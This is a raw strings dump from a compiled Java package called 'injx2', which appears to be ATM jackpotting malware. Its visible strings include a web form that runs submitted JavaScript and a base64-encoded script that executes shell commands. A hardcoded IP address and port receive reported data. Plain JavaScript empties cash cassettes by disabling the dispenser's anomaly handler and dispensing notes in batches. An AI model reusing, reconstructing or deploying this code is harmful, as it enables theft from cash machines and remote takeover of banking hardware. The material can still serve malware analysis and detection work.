000000002B2D 0 injx2/Global 000000002B3C 000000002B3C 0 runningclass 000000002B4B 000000002B4B 0 Ljava/util/Map; 000000002B5D 000000002B5D 0 getName 000000002B67 000000002B67 0 ()Ljava/lang/String; 000000002B7E 000000002B7E 0 java/util/Map File pos Mem pos ID Text ======== ======= == ==== 000000002B93 000000002B93 0 8(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object; 000000002BCF 000000002BCF 0 equals 000000002BD8 000000002BD8 0 (Ljava/lang/Object;)Z 000000002BF0 000000002BF0 0 java/util/Arrays 000000002C03 000000002C03 0 asList 000000002C0B 000000002C0B 0 %([Ljava/lang/Object;)Ljava/util/List; 000000002C34 000000002C34 0 (Ljava/util/Collection;)V 000000002C50 000000002C50 0 hashCode 000000002C61 000000002C61 0 java/lang/Integer 000000002C75 000000002C75 0 toString 000000002C80 000000002C80 0 (I)Ljava/lang/String; 000000002C98 000000002C98 0 contains 000000002CA3 000000002CA3 0 checklog 000000002CAE 000000002CAE 0 getDefault 000000002CBB 000000002CBB 0 ()Linjx2/javassist/ClassPool; 000000002CE2 000000002CE2 0 Ljava/io/BufferedWriter; 000000002CFD 000000002CFD 0 append 000000002D05 000000002D05 0 -(Ljava/lang/String;)Ljava/lang/StringBuilder; 000000002D36 000000002D36 0 write 000000002D3E 000000002D3E 0 (Ljava/lang/String;)V 000000002D56 000000002D56 0 flush 000000002D5E 000000002D5E 0 startsWith 000000002D6B 000000002D6B 0 (Ljava/lang/String;)Z 000000002D83 000000002D83 0 getClassLoader 000000002D94 000000002D94 0 replace 000000002D9E 000000002D9E 0 (CC)Ljava/lang/String; 000000002DB7 000000002DB7 0 getResource 000000002DC4 000000002DC4 0 "(Ljava/lang/String;)Ljava/net/URL; 000000002DE9 000000002DE9 0 D(Ljava/lang/CharSequence;Ljava/lang/CharSequence;)Ljava/lang/String; 000000002E31 000000002E31 0 printStackTrace 000000002E43 000000002E43 0 getLocalizedMessage 000000002E59 000000002E59 0 getMessage 000000002E66 000000002E66 0 java/util/logging/Logger 000000002E80 000000002E80 0 getLogger 000000002E8C 000000002E8C 0 .(Ljava/lang/String;)Ljava/util/logging/Logger; 000000002EBE 000000002EBE 0 java/util/logging/Level 000000002ED8 000000002ED8 0 SEVERE 000000002EE1 000000002EE1 0 Ljava/util/logging/Level; 000000002F02 000000002F02 0 C(Ljava/util/logging/Level;Ljava/lang/String;Ljava/lang/Throwable;)V 000000002F48 000000002F48 0 origbytes 000000002F55 000000002F55 0 Ljava/util/Hashtable; 000000002F72 000000002F72 0 &(Ljava/lang/Object;)Ljava/lang/Object; 000000002F9B 000000002F9B 0 -(Ljava/lang/String;)Linjx2/javassist/CtClass; 000000002FCC 000000002FCC 0 stopPruning 000000002FE1 000000002FE1 0 isFrozen 000000002FF2 000000002FF2 0 defrost 000000002FFC 000000002FFC 0 clone 000000003004 000000003004 0 ()Ljava/lang/Object; 00000000301B 00000000301B 0 ([B)V 000000003022 000000003022 0 makeClass 00000000302E 00000000302E 0 0(Ljava/io/InputStream;)Linjx2/javassist/CtClass; 000000003062 000000003062 0 rebuildClassFile 000000003075 000000003075 0 toBytecode 000000003089 000000003089 0 getDeclaredMethods 00000000309E 00000000309E 0 ()[Linjx2/javassist/CtMethod; 0000000030BE 0000000030BE 0 getDeclaredConstructors 0000000030D7 0000000030D7 0 "()[Linjx2/javassist/CtConstructor; 0000000030FD 0000000030FD 0 getDeclaredMethod 000000003110 000000003110 0 .(Ljava/lang/String;)Linjx2/javassist/CtMethod; 000000003142 000000003142 0 getParameterTypes File pos Mem pos ID Text ======== ======= == ==== 000000003156 000000003156 0 ()[Linjx2/javassist/CtClass; 000000003175 000000003175 0 split 00000000317C 00000000317C 0 '(Ljava/lang/String;)[Ljava/lang/String; 0000000031A7 0000000031A7 0 replaceAll 0000000031B3 0000000031B3 0 8(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String; 0000000031EF 0000000031EF 0 toUpperCase 0000000031FD 0000000031FD 0 getModifiers 00000000320C 00000000320C 0 injx2/javassist/Modifier 000000003227 000000003227 0 isNative 000000003239 000000003239 0 isAbstract 000000003246 000000003246 0 insertBefore 000000003255 000000003255 0 insertAfter 000000003263 000000003263 0 (Ljava/lang/Class;[B)V 00000000327C 00000000327C 0 redefineClasses 00000000328D 00000000328D 0 *([Ljava/lang/instrument/ClassDefinition;)V 0000000032BB 0000000032BB 0 (Ljava/io/Writer;)V 0000000032D1 0000000032D1 0 (Ljava/io/PrintWriter;)V 0000000032F3 0000000032F3 0 (Ljava/io/InputStream;)V 00000000330E 00000000330E 0 getProperty 00000000331C 00000000331C 0 parseInt 000000003327 000000003327 0 (Ljava/lang/String;)I 00000000333F 00000000333F 0 injx2/HTTPServ 00000000335B 00000000335B 0 &(Ljava/lang/String;)Ljava/lang/String; 00000000338B 00000000338B 0 (Ljava/io/OutputStream;)V 0000000033A7 0000000033A7 0 close 0000000033AF 0000000033AF 0 forName 0000000033B8 0000000033B8 0 %(Ljava/lang/String;)Ljava/lang/Class; 0000000033E1 0000000033E1 0 getDeclaredField 0000000033F3 0000000033F3 0 -(Ljava/lang/String;)Ljava/lang/reflect/Field; 000000003424 000000003424 0 java/lang/reflect/Field 00000000343E 00000000343E 0 setAccessible 00000000345A 00000000345A 0 '(Ljava/lang/Object;Ljava/lang/Object;)V 000000003485 000000003485 0 isDirectory 000000003492 000000003492 0 listFiles 00000000349F 00000000349F 0 ()[Ljava/io/File; 0000000034B3 0000000034B3 0 getCanonicalPath 0000000034C6 0000000034C6 0 appendClassPath 0000000034D7 0000000034D7 0 /(Ljava/lang/String;)Linjx2/javassist/ClassPath; 00000000350A 00000000350A 0 getParentFile 00000000351A 00000000351A 0 ()Ljava/io/File; 00000000352D 00000000352D 0 getAbsolutePath 00000000353F 00000000353F 0 (Ljava/lang/String;Z)V 000000003558 000000003558 0 setErr 000000003561 000000003561 0 (Ljava/io/PrintStream;)V 00000000357C 00000000357C 0 (Ljava/lang/Runnable;)V 000000003596 000000003596 0 start 00000000359E 00000000359E 0 sleep 0000000035AD 0000000035AD 0 getProtectionDomain 0000000035C2 0000000035C2 0 "()Ljava/security/ProtectionDomain; 0000000035E8 0000000035E8 0 java/security/ProtectionDomain 000000003609 000000003609 0 getCodeSource 000000003619 000000003619 0 ()Ljava/security/CodeSource; 000000003638 000000003638 0 java/security/CodeSource 000000003653 000000003653 0 getLocation 000000003661 000000003661 0 ()Ljava/net/URL; 000000003674 000000003674 0 toURI 00000000367C 00000000367C 0 ()Ljava/net/URI; 00000000368F 00000000368F 0 java/net/URI 00000000369E 00000000369E 0 getPath 0000000036A7 0000000036A7 0 "appendToBootstrapClassLoaderSearch File pos Mem pos ID Text ======== ======= == ==== 0000000036CD 0000000036CD 0 (Ljava/util/jar/JarFile;)V 0000000036EA 0000000036EA 0 currentThread 0000000036FA 0000000036FA 0 ()Ljava/lang/Thread; 000000003711 000000003711 0 setContextClassLoader 000000003729 000000003729 0 (Ljava/lang/ClassLoader;)V 000000003745 000000003745 0 loadClass 000000003751 000000003751 0 @(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method; 000000003795 000000003795 0 java/lang/reflect/Method 0000000037B0 0000000037B0 0 invoke 0000000037B8 0000000037B8 0 9(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object; 000000005988 000000005988 0 injx2/Global.class 000000005AFD 000000005AFD 0 Ljava/io/BufferedWriter; 000000005B18 000000005B18 0 verbose 000000005B25 000000005B25 0 logoutput 000000005B32 000000005B32 0 Ljava/lang/String; 000000005B47 000000005B47 0 instrument 000000005B53 000000005B53 0 &Ljava/lang/instrument/Instrumentation; 000000005B7C 000000005B7C 0 origbytes 000000005B89 000000005B89 0 Ljava/util/Hashtable; 000000005BA0 000000005BA0 0 Signature 000000005BAC 000000005BAC 0 +Ljava/util/Hashtable<Ljava/lang/String;[B>; 000000005BDB 000000005BDB 0 alreadyinjected 000000005BEC 000000005BEC 0 ;Ljava/util/Hashtable<Ljava/lang/String;Ljava/lang/String;>; 000000005C31 000000005C31 0 Ljava/util/Map; 000000005C42 000000005C42 0 5Ljava/util/Map<Ljava/lang/Object;Ljava/lang/Object;>; 000000005C7B 000000005C7B 0 stack 000000005C83 000000005C83 0 classmap 000000005C8E 000000005C8E 0 runningclass 000000005C9D 000000005C9D 0 <init> 000000005CB3 000000005CB3 0 LineNumberTable 000000005CC5 000000005CC5 0 LocalVariableTable 000000005CE1 000000005CE1 0 Linjx2/Global; 000000005CF2 000000005CF2 0 scandyna 000000005D07 000000005D07 0 tsize 000000005D19 000000005D19 0 Ljava/util/zip/ZipEntry; 000000005D41 000000005D41 0 Ljava/net/URL; 000000005D57 000000005D57 0 Ljava/io/IOException; 000000005D75 000000005D75 0 Ljava/util/zip/ZipInputStream; 000000005D9C 000000005D9C 0 Ljava/security/CodeSource; 000000005DB9 000000005DB9 0 StackMapTable 000000005DDE 000000005DDE 0 callback 000000005DE8 000000005DE8 0 K(Ljava/lang/String;Ljava/lang/String;[Ljava/lang/Object;)Ljava/lang/Object; 000000005E37 000000005E37 0 ptype 000000005E3F 000000005E3F 0 [Ljava/lang/Class; 000000005E54 000000005E54 0 mname 000000005E65 000000005E65 0 Ljava/lang/Class; 000000005E7D 000000005E7D 0 Ljava/lang/Object; 000000005E99 000000005E99 0 [Ljava/lang/reflect/Method; 000000005EB7 000000005EB7 0 Ljava/lang/Exception; 000000005ECF 000000005ECF 0 classs 000000005ED8 000000005ED8 0 method 000000005EE8 000000005EE8 0 [Ljava/lang/Object; 000000005F03 000000005F03 0 Linjx2/ViewClassLoader; 000000005F1D 000000005F1D 0 LocalVariableTypeTable 000000005F36 000000005F36 0 [Ljava/lang/Class<*>; 000000005F62 000000005F62 0 insertjar 000000005F6F 000000005F6F 0 ([B)V 000000005F77 000000005F77 0 cname 000000005F7F 000000005F7F 0 stream 000000005F88 000000005F88 0 entry File pos Mem pos ID Text ======== ======= == ==== 000000005F90 000000005F90 0 jfile 000000005F98 000000005F98 0 checklog 000000005FAF 000000005FAF 0 Ljava/io/File; 000000005FC3 000000005FC3 0 <clinit> 000000005FCE 000000005FCE 0 SourceFile 000000005FDB 000000005FDB 0 Global.java 000000005FEE 000000005FEE 0 injx2/Global 000000006015 000000006015 0 java/util/zip/ZipInputStream 00000000604E 00000000604E 0 dynamic/ 000000006089 000000006089 0 java/io/IOException 0000000060B4 0000000060B4 0 injx2/ViewClassLoader 0000000060E8 0000000060E8 0 java/lang/Object 000000006100 000000006100 0 java/lang/Exception 000000006116 000000006116 0 java/io/ByteArrayInputStream 00000000613A 00000000613A 0 .class 000000006169 000000006169 0 java/io/File 000000006178 000000006178 0 /dev/shm 00000000618D 00000000618D 0 java/lang/StringBuilder 0000000061AC 0000000061AC 0 /.loginside 0000000061BF 0000000061BF 0 os.name 0000000061DE 0000000061DE 0 APPDATA 0000000061ED 0000000061ED 0 \logft.log 0000000061FA 0000000061FA 0 stdout 000000006203 000000006203 0 java/io/BufferedWriter 00000000621C 00000000621C 0 java/io/OutputStreamWriter 000000006248 000000006248 0 java/io/FileWriter 000000006262 000000006262 0 java/util/HashMap 00000000628D 00000000628D 0 java/security/CodeSource 0000000062A8 0000000062A8 0 java/net/URL 0000000062B7 0000000062B7 0 java/util/zip/ZipEntry 0000000062D0 0000000062D0 0 java/lang/Throwable 0000000062E6 0000000062E6 0 java/lang/String 0000000062F9 0000000062F9 0 java/lang/Class 00000000630B 00000000630B 0 getProtectionDomain 000000006320 000000006320 0 "()Ljava/security/ProtectionDomain; 000000006346 000000006346 0 java/security/ProtectionDomain 000000006367 000000006367 0 getCodeSource 000000006377 000000006377 0 ()Ljava/security/CodeSource; 000000006396 000000006396 0 getLocation 0000000063A4 0000000063A4 0 ()Ljava/net/URL; 0000000063B7 0000000063B7 0 openStream 0000000063C4 0000000063C4 0 ()Ljava/io/InputStream; 0000000063DE 0000000063DE 0 (Ljava/io/InputStream;)V 0000000063F9 0000000063F9 0 getNextEntry 000000006408 000000006408 0 ()Ljava/util/zip/ZipEntry; 000000006425 000000006425 0 getName 00000000642F 00000000642F 0 ()Ljava/lang/String; 000000006446 000000006446 0 startsWith 000000006453 000000006453 0 (Ljava/lang/String;)Z 00000000646B 00000000646B 0 endsWith 000000006476 000000006476 0 getSize 00000000648D 00000000648D 0 ([B)I 000000006495 000000006495 0 java/lang/System 0000000064A7 0000000064A7 0 arraycopy 0000000064B3 0000000064B3 0 *(Ljava/lang/Object;ILjava/lang/Object;II)V 0000000064E1 0000000064E1 0 close 0000000064E9 0000000064E9 0 java/util/logging/Logger 000000006503 000000006503 0 getLogger 00000000650F 00000000650F 0 .(Ljava/lang/String;)Ljava/util/logging/Logger; 000000006541 000000006541 0 java/util/logging/Level File pos Mem pos ID Text ======== ======= == ==== 00000000655B 00000000655B 0 SEVERE 000000006564 000000006564 0 Ljava/util/logging/Level; 000000006585 000000006585 0 C(Ljava/util/logging/Level;Ljava/lang/String;Ljava/lang/Throwable;)V 0000000065CB 0000000065CB 0 loadClass 0000000065D7 0000000065D7 0 %(Ljava/lang/String;)Ljava/lang/Class; 000000006600 000000006600 0 newInstance 00000000660E 00000000660E 0 ()Ljava/lang/Object; 000000006625 000000006625 0 getMethods 000000006632 000000006632 0 ()[Ljava/lang/reflect/Method; 000000006652 000000006652 0 java/lang/reflect/Method 00000000666D 00000000666D 0 equals 000000006676 000000006676 0 (Ljava/lang/Object;)Z 00000000668E 00000000668E 0 getParameterTypes 0000000066A2 0000000066A2 0 ()[Ljava/lang/Class; 0000000066B9 0000000066B9 0 invoke 0000000066C1 0000000066C1 0 9(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object; 0000000066FE 0000000066FE 0 java/util/Map 000000006713 000000006713 0 8(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object; 00000000674F 00000000674F 0 printStackTrace 000000006761 000000006761 0 (Ljava/lang/String;)V 000000006779 000000006779 0 isDirectory 00000000678D 00000000678D 0 append 000000006795 000000006795 0 -(Ljava/lang/String;)Ljava/lang/StringBuilder; 0000000067C6 0000000067C6 0 toString 0000000067D1 0000000067D1 0 getProperty 0000000067DE 0000000067DE 0 &(Ljava/lang/String;)Ljava/lang/String; 000000006808 000000006808 0 toLowerCase 000000006816 000000006816 0 indexOf 000000006820 000000006820 0 (Ljava/lang/String;)I 000000006838 000000006838 0 getenv 000000006847 000000006847 0 Ljava/io/PrintStream; 00000000685F 00000000685F 0 (Ljava/io/OutputStream;)V 00000000687B 00000000687B 0 (Ljava/io/Writer;)V 000000006891 000000006891 0 java/util/Collections 0000000068A9 0000000068A9 0 synchronizedMap 0000000068BA 0000000068BA 0 (Ljava/util/Map;)Ljava/util/Map; 000000007103 000000007103 0 injx2/HTTPServ$MyHandler$dispen.class 0000000071FA 0000000071FA 0 Ljava/lang/String; 000000007214 000000007214 0 this$0 00000000721F 00000000721F 0 MyHandler 00000000722C 00000000722C 0 InnerClasses 00000000723B 00000000723B 0 Linjx2/HTTPServ$MyHandler; 000000007258 000000007258 0 <init> 000000007260 000000007260 0 A(Linjx2/HTTPServ$MyHandler;Ljava/lang/String;Ljava/lang/String;)V 0000000072AC 0000000072AC 0 LineNumberTable 0000000072BE 0000000072BE 0 LocalVariableTable 0000000072DA 0000000072DA 0 dispen 0000000072E2 0000000072E2 0 !Linjx2/HTTPServ$MyHandler$dispen; 000000007318 000000007318 0 result 000000007321 000000007321 0 rawData 000000007336 000000007336 0 Ljava/net/URL; 00000000734E 00000000734E 0 Ljava/net/HttpURLConnection; 000000007372 000000007372 0 Ljava/io/OutputStream; 000000007391 000000007391 0 Ljava/lang/Exception; 0000000073AE 0000000073AE 0 StackMapTable 0000000073C7 0000000073C7 0 SourceFile 0000000073D4 0000000073D4 0 HTTPServ.java 0000000073FD 0000000073FD 0 %%list_dispense%% 000000007426 000000007426 0 java/lang/StringBuilder 00000000747A 00000000747A 0 !application/x-www-form-urlencoded File pos Mem pos ID Text ======== ======= == ==== 00000000749F 00000000749F 0 java/net/URL 0000000074BD 0000000074BD 0 java/net/HttpURLConnection 0000000074EB 0000000074EB 0 Content-Type 0000000074FF 0000000074FF 0 Content-Length 000000007531 000000007531 0 java/lang/Exception 000000007547 000000007547 0 ERRSRV 000000007551 000000007551 0 injx2/HTTPServ$MyHandler$dispen 000000007573 000000007573 0 java/lang/Thread 000000007589 000000007589 0 injx2/HTTPServ$MyHandler 0000000075AA 0000000075AA 0 java/lang/String 0000000075BD 0000000075BD 0 replaceAll 0000000075C9 0000000075C9 0 8(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String; 000000007605 000000007605 0 runjs 00000000760C 00000000760C 0 &(Ljava/lang/String;)Ljava/lang/String; 000000007636 000000007636 0 injx2/Global 00000000764C 00000000764C 0 Ljava/io/BufferedWriter; 000000007667 000000007667 0 append 00000000766F 00000000766F 0 -(Ljava/lang/String;)Ljava/lang/StringBuilder; 0000000076A0 0000000076A0 0 toString 0000000076AB 0000000076AB 0 ()Ljava/lang/String; 0000000076C2 0000000076C2 0 java/io/BufferedWriter 0000000076DB 0000000076DB 0 write 0000000076E3 0000000076E3 0 (Ljava/lang/String;)V 0000000076FB 0000000076FB 0 flush 000000007703 000000007703 0 getBytes 000000007714 000000007714 0 javax/xml/bind/DatatypeConverter 000000007738 000000007738 0 printBase64Binary 00000000774C 00000000774C 0 ([B)Ljava/lang/String; 000000007765 000000007765 0 java/net/URLEncoder 00000000777B 00000000777B 0 encode 000000007783 000000007783 0 urlreport 000000007790 000000007790 0 openConnection 0000000077A1 0000000077A1 0 ()Ljava/net/URLConnection; 0000000077BE 0000000077BE 0 setDoOutput 0000000077D3 0000000077D3 0 setRequestMethod 0000000077E6 0000000077E6 0 setRequestProperty 0000000077FA 0000000077FA 0 '(Ljava/lang/String;Ljava/lang/String;)V 000000007825 000000007825 0 length 000000007834 000000007834 0 valueOf 00000000783E 00000000783E 0 (I)Ljava/lang/String; 000000007856 000000007856 0 connect 000000007860 000000007860 0 getOutputStream 000000007872 000000007872 0 ()Ljava/io/OutputStream; 00000000788D 00000000788D 0 java/io/OutputStream 0000000078A4 0000000078A4 0 ([B)V 0000000078AC 0000000078AC 0 getInputStream 0000000078BD 0000000078BD 0 ()Ljava/io/InputStream; 0000000078D7 0000000078D7 0 injx2/HTTPServ 000000007B9D 000000007B9D 0 injx2/HTTPServ$MyHandler.class 000000007E82 000000007E82 0 MyHandler 000000007E8F 000000007E8F 0 InnerClasses 000000007E9E 000000007E9E 0 dispen 000000007EA6 000000007EA6 0 urlreport 000000007EB3 000000007EB3 0 Ljava/lang/String; 000000007EC8 000000007EC8 0 jscmd 000000007EDD 000000007EDD 0 <init> 000000007EF3 000000007EF3 0 LineNumberTable 000000007F05 000000007F05 0 LocalVariableTable 000000007F21 000000007F21 0 Linjx2/HTTPServ$MyHandler; 000000007F3E 000000007F3E 0 runjs File pos Mem pos ID Text ======== ======= == ==== 000000007F45 000000007F45 0 &(Ljava/lang/String;)Ljava/lang/String; 000000007F73 000000007F73 0 Ljavax/script/ScriptException; 000000007F94 000000007F94 0 script 000000007F9D 000000007F9D 0 manager 000000007FA6 000000007FA6 0 "Ljavax/script/ScriptEngineManager; 000000007FCC 000000007FCC 0 engine 000000007FD5 000000007FD5 0 Ljavax/script/ScriptEngine; 000000007FF8 000000007FF8 0 Ljava/io/StringWriter; 000000008016 000000008016 0 Ljava/io/PrintWriter; 000000008035 000000008035 0 StackMapTable 000000008057 000000008057 0 handle 00000000805F 00000000805F 0 ((Lcom/sun/net/httpserver/HttpExchange;)V 00000000809A 00000000809A 0 Ljava/io/InputStream; 0000000080B2 0000000080B2 0 reader 0000000080BB 0000000080BB 0 Ljava/io/BufferedReader; 0000000080DC 0000000080DC 0 Ljava/lang/StringBuilder; 00000000810A 00000000810A 0 Ljava/util/regex/Pattern; 00000000812A 00000000812A 0 Ljava/util/regex/Matcher; 00000000815D 00000000815D 0 [Ljava/lang/Class; 000000008182 000000008182 0 [Ljava/lang/reflect/Method; 0000000081A4 0000000081A4 0 Ljava/lang/Class; 0000000081BD 0000000081BD 0 [Ljava/lang/String; 0000000081D3 0000000081D3 0 lstatus 0000000081E7 0000000081E7 0 Ljava/lang/Object; 000000008201 000000008201 0 Ljava/lang/Exception; 00000000821F 00000000821F 0 [Ljava/lang/Object; 000000008235 000000008235 0 match 000000008244 000000008244 0 param 00000000824C 00000000824C 0 entry 000000008259 000000008259 0 Ljava/util/Iterator; 000000008270 000000008270 0 jfile 00000000827D 00000000827D 0 ptype 000000008285 000000008285 0 mname 0000000082A6 0000000082A6 0 Linjx2/ViewClassLoader; 0000000082CE 0000000082CE 0 function 0000000082D9 0000000082D9 0 xjscmd 0000000082F7 0000000082F7 0 %Lcom/sun/net/httpserver/HttpExchange; 000000008320 000000008320 0 response 00000000832B 00000000832B 0 method 000000008334 000000008334 0 out_cmd 000000008343 000000008343 0 Ljava/io/OutputStream; 00000000835C 00000000835C 0 LocalVariableTypeTable 000000008375 000000008375 0 [Ljava/lang/Class<*>; 0000000083BD 0000000083BD 0 Exceptions 0000000083CD 0000000083CD 0 <clinit> 0000000083D8 0000000083D8 0 SourceFile 0000000083E5 0000000083E5 0 HTTPServ.java 0000000083F9 0000000083F9 0 javax/script/ScriptEngineManager 00000000841D 00000000841D 0 injx2/HTTPServ 000000008442 000000008442 0 java/io/StringWriter 000000008459 000000008459 0 java/io/PrintWriter 00000000848E 00000000848E 0 javax/script/ScriptException 0000000084CC 0000000084CC 0 java/lang/StringBuilder 000000008511 000000008511 0 java/io/BufferedReader 00000000852A 00000000852A 0 java/io/InputStreamReader 00000000857B 00000000857B 0 &]+)=([ 0000000085B8 0000000085B8 0 Got query 0000000085CF 0000000085CF 0 Dispensing 0000000085DD 0000000085DD 0 injx2/HTTPServ$MyHandler$dispen 000000008636 000000008636 0 I<form action="/eva" method="POST"><textarea rows="15" cols="40" name="j"> File pos Mem pos ID Text ======== ======= == ==== 000000008683 000000008683 0 </textarea><br /><input type="submit" value="Run"></form><textarea rows="15" cols="40" readonly> 0000000086E6 0000000086E6 0 </textarea> 000000008716 000000008716 0 java/lang/Class 000000008734 000000008734 0 </h1><br /> 000000008754 000000008754 0 <a href="/mgr? 000000008781 000000008781 0 )</a><br /> 000000008795 000000008795 0 java/lang/String 0000000087B6 0000000087B6 0 !<form method="post" action="/mgr? 0000000087DA 0000000087DA 0 "><table> 0000000087E7 0000000087E7 0 <tr><td><b> 0000000087F4 0000000087F4 0 6</b></td><td><input type="text" name="ps" /></td></tr> 00000000882D 00000000882D 0 ;</table><br /><input type="submit" value="Invoke" /></form> 00000000886C 00000000886C 0 java/lang/Object 000000008896 000000008896 0 <b>Preparing...</b><br /> 0000000088B7 0000000088B7 0 <b>Unprotecting...</b><br /> 0000000088DB 0000000088DB 0 <b>Invoking...</b><br /> 0000000088FB 0000000088FB 0 <b>Return: </b> 00000000890D 00000000890D 0 java/lang/Exception 000000008923 000000008923 0 <h1>Entries: </h1><br /> 000000008958 000000008958 0 </a><br /> 000000008965 000000008965 0 /core 00000000898A 00000000898A 0 injx2/ViewClassLoader 0000000089B1 0000000089B1 0 <form action="/core" method="post"><table><tr><td> 0000000089E4 0000000089E4 0 <b>Jar: </b></td><td><input type="text" name="0"></td></tr> 000000008A20 000000008A20 0 <tr><td><b>Class: </b></td><td><input type="text" name="1"></td></tr><tr><td><b>Method: </b></td><td><input type="text" name="2"></td></tr><tr><td><b>Args: </b></td><td><input type="text" name="3"></td></tr><tr><td><input type="radio" name="4" vale="a"><b> Autostart</b></td><td><input type="radio" name="4" vale="h" checked><b> Handler</b></td></tr><tr><td></td><td><input type="submit" value="Go"></td></tr></table> 000000008BC2 000000008BC2 0 </form> 000000008BCC 000000008BCC 0 This is POST 000000008C07 000000008C07 0 os.name 000000008C29 000000008C29 0 cKJd.exe 000000008C3D 000000008C3D 0 %%shell%% 000000008C4A 000000008C4A 0 %%arg%% 000000008C54 000000008C54 0 %%cmdb64%% 000000008C6B 000000008C6B 0 Content-Type 000000008C79 000000008C79 0 text/html 000000008CAA 000000008CAA 0 http://150.100.246.18:60000 000000008CCD 000000008CCD 0 dmFyIEJ1ZmZlcmVkUmVhZGVyPVBhY2thZ2VzLmphdmEubGFuZy5DbGFzcy5mb3JOYW1lKCJqYXZhLmlvLkJ1ZmZlcmVkUmVhZGVyIik7CnZhciBSZWFkZXI9UGFja2FnZXMuamF2YS5sYW5nLkNsYXNzLmZvck5hbWUoImphdmEuaW8uUmVhZGVyIik7CnZhciBJbnB1dFN0cmVhbT1QYWNrYWdlcy5qYXZhLmxhbmcuQ2xhc3MuZm9yTmFtZSgiamF2YS5pby5JbnB1dFN0cmVhbSIpOwp2YXIgcD1QYWNrYWdlcy5qYXZhLmxhbmcuUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYyhbIiUlc2hlbGwlJSIsIiUlYXJnJSUiLGphdmEubGFuZy5TdHJpbmcoUGFja2FnZXMuamF2YXgueG1sLmJpbmQuRGF0YXR5cGVDb252ZXJ0ZXIucGFyc2VCYXNlNjRCaW5hcnkoIiUlY21kYjY0JSUiKSldKTsKdmFyIGJ1Zj1qYXZhLmlvLkJ1ZmZlcmVkUmVhZGVyKGphdmEuaW8uSW5wdXRTdHJlYW1SZWFkZXIocC5nZXRJbnB1dFN0cmVhbSgpKSk7CndoaWxlKDEpewoJdmFyIGxpbmU9YnVmLnJlYWRMaW5lKCk7CglpZihsaW5lIT1udWxsKXsKCQlwcmludChsaW5lKyJcbiIpOwoJfSBlbHNlIHsKCQlicmVhazsKCX0KfQoKCg== 000000008FC0 000000008FC0 0 var tGlobal=Packages.java.lang.Class.forName("injx2.Global"); 000000008FFE 000000008FFE 0 var Global=tGlobal.cast(tGlobal.newInstance()); 00000000902E 00000000902E 0 var tPeripheral=Global.runningclass.get("Peripheral"); 000000009065 000000009065 0 var Peripheral=tPeripheral.cast(tPeripheral.newInstance()); 0000000090A1 0000000090A1 0 var jsd=Peripheral.Dispenser;if(!jsd.isOk()){print("DERROR");} else {var resume=""; 0000000090F5 0000000090F5 0 for (var j = 0; j < jsd.getNumberOfCashUnits(); j++) { 00000000912C 00000000912C 0 resume+=jsd.getCashUnit(j).getValue()+":"+jsd.getCashUnit(j).getActual()+";"; 00000000917D 00000000917D 0 print(resume+"\n");} 000000009194 000000009194 0 var tGlobal=Packages.java.lang.Class.forName("injx2.Global"); 0000000091D2 0000000091D2 0 var Global=tGlobal.cast(tGlobal.newInstance()); 000000009202 000000009202 0 var tPeripheral=Global.runningclass.get("Peripheral"); 000000009239 000000009239 0 var Peripheral=tPeripheral.cast(tPeripheral.newInstance()); 000000009275 000000009275 0 var jsd=Peripheral.Dispenser; 000000009293 000000009293 0 jsd.clearDispenseValues(); 0000000092AE 0000000092AE 0 jsd.removeAnomalyHandler("Dispenser"); 0000000092D5 0000000092D5 0 var todispen=[%%list_dispense%%]; 0000000092F7 0000000092F7 0 var cassette=[]; 000000009308 000000009308 0 var resume=""; 000000009317 000000009317 0 for (var j = 0; j < jsd.getNumberOfCashUnits(); j++) { 00000000934E 00000000934E 0 resume+=jsd.getCashUnit(j).getValue()+":"+jsd.getCashUnit(j).getActual()+";"; 00000000939D 00000000939D 0 if(parseInt(jsd.getCashUnit(j).getValue())<=0 || j>=todispen.length){ 0000000093E4 0000000093E4 0 continue; 0000000093F3 0000000093F3 0 if(todispen[j]>=jsd.getCashUnit(j).getActual()-100){ 000000009429 000000009429 0 todispen[j]=jsd.getCashUnit(j).getActual()-100; File pos Mem pos ID Text ======== ======= == ==== 00000000945E 00000000945E 0 cassette.push({denom: jsd.getCashUnit(j).getValue(), id: j}); 00000000949F 00000000949F 0 print(resume+"\n"); 0000000094B3 0000000094B3 0 cassette=cassette.sort(function(a, b){return a.denom - b.denom}); 0000000094F5 0000000094F5 0 for(var ci=cassette.length-1;ci>=0;ci--){ 00000000951F 00000000951F 0 if(todispen[cassette[ci]['id']]>0){ 000000009544 000000009544 0 var roundx=Math.ceil(todispen[cassette[ci]['id']]/40); 00000000957D 00000000957D 0 for(var k=0; k<roundx;k++){ 00000000959B 00000000959B 0 jsd.clearDispenseValues(); 0000000095B9 0000000095B9 0 var amount=todispen[cassette[ci]['id']]; 0000000095E5 0000000095E5 0 if(amount>40){ 0000000095F7 0000000095F7 0 amount=40; 00000000960B 00000000960B 0 todispen[cassette[ci]['id']]-=amount; 000000009634 000000009634 0 jsd.getCashUnit(ci).setDispense(amount); 000000009660 000000009660 0 print(cassette[ci]['id']+":"+cassette[ci]['denom']+":"+amount+"\n"); 0000000096A8 0000000096A8 0 var x = jsd.dispense(); 0000000096C3 0000000096C3 0 if(!x){ print("ERROR:"+jsd.getCommandStatusString()+"\n");break;} 000000009708 000000009708 0 var y = jsd.present(); 000000009722 000000009722 0 var z = jsd.waitForBillsTaken(30); 000000009751 000000009751 0 jsd.setAnomalyHandler("Dispenser"); 00000000977C 00000000977C 0 injx2/HTTPServ$MyHandler 000000009796 000000009796 0 "com/sun/net/httpserver/HttpHandler 0000000097BC 0000000097BC 0 javax/script/ScriptEngine 0000000097D7 0000000097D7 0 #com/sun/net/httpserver/HttpExchange 0000000097FE 0000000097FE 0 java/io/InputStream 000000009814 000000009814 0 java/util/regex/Pattern 00000000982E 00000000982E 0 java/util/regex/Matcher 000000009848 000000009848 0 java/util/Iterator 00000000985D 00000000985D 0 java/io/IOException 000000009873 000000009873 0 getClassLoader 000000009884 000000009884 0 ()Ljava/lang/ClassLoader; 0000000098A0 0000000098A0 0 (Ljava/lang/ClassLoader;)V 0000000098BD 0000000098BD 0 getEngineByExtension 0000000098D3 0000000098D3 0 /(Ljava/lang/String;)Ljavax/script/ScriptEngine; 